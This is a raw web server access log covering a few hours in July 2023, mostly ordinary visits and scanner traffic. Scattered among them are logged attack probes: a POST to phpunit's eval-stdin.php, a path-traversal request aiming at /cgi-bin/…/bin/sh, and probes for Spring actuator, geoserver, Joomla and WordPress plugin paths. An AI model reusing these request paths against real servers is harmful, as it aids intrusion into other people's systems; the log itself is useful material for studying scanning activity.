- [15/Jul/2023:20:11:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 45.83.65.216 - - [15/Jul/2023:20:11:15 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 91.224.92.16 - - [15/Jul/2023:20:22:06 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 198.199.92.105 - - [15/Jul/2023:20:33:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 166.0.218.199 - - [15/Jul/2023:20:34:29 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:62.0) Gecko/20100101 Firefox/62.0" 213.109.202.66 - - [15/Jul/2023:20:35:53 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 85.128.143.245 - - [15/Jul/2023:21:01:50 +0200] "GET /wp-content/plugins/ht-mega-for-elementor/assets/css/htbbootstrap.css HTTP/1.1" 404 433 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1" 213.109.202.66 - - [15/Jul/2023:21:02:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.180.143.141 - - [15/Jul/2023:21:45:58 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 213.109.202.66 - - [15/Jul/2023:22:00:46 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.200.163 - - [15/Jul/2023:22:09:37 +0200] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 192.241.201.42 - - [15/Jul/2023:22:12:30 +0200] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x" 183.136.225.43 - - [15/Jul/2023:22:34:18 +0200] "\x16\x03\x01\x02" 400 383 "-" "-" 213.109.202.66 - - [15/Jul/2023:22:39:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 108.18.130.219 - - [15/Jul/2023:22:47:11 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 96.241.134.111 - - [15/Jul/2023:23:03:11 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1971.1019 Mobile Safari/537.36" 213.109.202.66 - - [15/Jul/2023:23:13:56 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 213.109.202.66 - - [15/Jul/2023:23:34:32 +0200] "GET /geoserver HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 35.240.121.17 - - [16/Jul/2023:00:00:20 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0" 207.90.244.10 - - [16/Jul/2023:00:12:25 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 207.90.244.10 - - [16/Jul/2023:00:12:25 +0200] "GET /robots.txt HTTP/1.1" 404 355 "-" "-" 207.90.244.10 - - [16/Jul/2023:00:12:27 +0200] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "-" 207.90.244.10 - - [16/Jul/2023:00:12:29 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "-" 207.90.244.10 - - [16/Jul/2023:00:12:34 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 102.129.235.128 - - [16/Jul/2023:00:56:10 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:95.0) Gecko/20100101 Firefox/95.0" 205.210.31.79 - - [16/Jul/2023:00:56:56 +0200] "\x16\x03\x01" 400 383 "-" "-"